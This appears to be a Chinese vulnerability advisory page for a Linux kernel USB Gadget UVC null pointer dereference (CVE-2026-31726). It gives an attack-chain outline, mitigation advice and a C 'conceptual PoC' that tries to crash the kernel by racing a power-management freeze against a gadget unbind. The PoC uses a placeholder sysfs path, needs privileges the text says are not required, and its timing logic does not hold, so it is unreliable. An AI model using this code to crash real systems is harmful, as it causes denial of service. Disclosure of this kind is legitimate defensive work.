CVE-2026-31726 CVSS 5.5 中危

CVE-2026-31726 Linux内核USB Gadget UVC空指针解引用漏洞

披露日期: 2026-05-01

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-31726

漏洞类型

空指针解引用

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核USB Gadget UVC驱动程序存在空指针解引用漏洞。该漏洞源于设备解绑流程与电源管理切换之间的竞态条件。当PM子系统冻结用户空间进程时，unbind线程会提前将关键的gadget指针置空。随后当系统恢复任务时，V4L2释放路径尝试访问该已失效指针，导致内核崩溃及系统拒绝服务。本地低权限攻击者可利用此漏洞导致系统宕机。

技术细节

该漏洞位于Linux内核的USB Gadget UVC驱动模块中。尽管之前的修复尝试通过引入延时等待机制来防止解绑时的内核崩溃，但在特定的电源管理（PM）场景下该机制失效。当PM子系统开始冻结用户空间进程时，`uvc_function_unbind`函数中的`wait_event_interruptible_timeout`被强制中断，导致解绑线程绕过等待直接将`cdev->gadget`指针置空。然而，此时V4L2设备的释放流程尚未结束。当PM子系统恢复任务或中止挂起时，`uvc_v4l2_release`路径被重新激活，尝试调用`usb_gadget_deactivate`访问已被置空的gadget指针，从而触发内核空指针解引用错误。本地低权限攻击者可通过控制设备状态与系统电源管理的时序，触发该竞态条件导致系统崩溃，造成拒绝服务。

攻击链分析

STEP 1

步骤1

攻击者获取本地低权限访问权限，并打开USB Gadget UVC设备节点（如/dev/video0）。

STEP 2

步骤2

攻击者触发系统电源管理操作（如系统休眠或冻结用户空间进程）。

STEP 3

步骤3

在PM冻结进程期间，攻击者触发USB Gadget的解绑操作（unbind）。

STEP 4

步骤4

系统恢复任务执行，V4L2释放路径尝试访问已被置空的gadget指针。

STEP 5

步骤5

触发内核空指针解引用错误，导致系统崩溃（Kernel Panic）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * Conceptual PoC for CVE-2026-31726
 * Trigger race condition between PM suspend and USB gadget unbind.
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/wait.h>

#define UVC_DEVICE "/dev/video0"

void trigger_unbind() {
    // Simulate unbind operation which sets cdev->gadget = NULL
    // Requires specific configfs or module unload permissions
    system("echo 'udc' > /sys/class/udc/.../function"); 
}

void trigger_pm_freeze() {
    // Trigger system freeze to interrupt wait_event
    system("echo freeze > /sys/power/state");
}

int main() {
    pid_t pid;
    int fd = open(UVC_DEVICE, O_RDWR);
    
    if (fd < 0) {
        perror("Failed to open UVC device");
        return 1;
    }

    printf("Starting PoC for CVE-2026-31726\n");

    pid = fork();
    if (pid == 0) {
        // Child process: Trigger PM freeze
        sleep(1);
        trigger_pm_freeze();
        exit(0);
    } else {
        // Parent process: Trigger unbind during freeze
        sleep(2); // Wait for freeze to start
        trigger_unbind();
        
        wait(NULL);
        // Upon resume, the kernel attempts to release the device
        // accessing the NULL pointer -> Kernel Panic
        close(fd);
    }
    return 0;
}

影响范围

Linux Kernel (修复补丁之前)

防御指南

临时缓解措施

避免在USB Gadget设备活跃时进行系统休眠或挂起操作。可以通过内核参数暂时禁用UVC Gadget驱动以防止利用，直至应用补丁。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表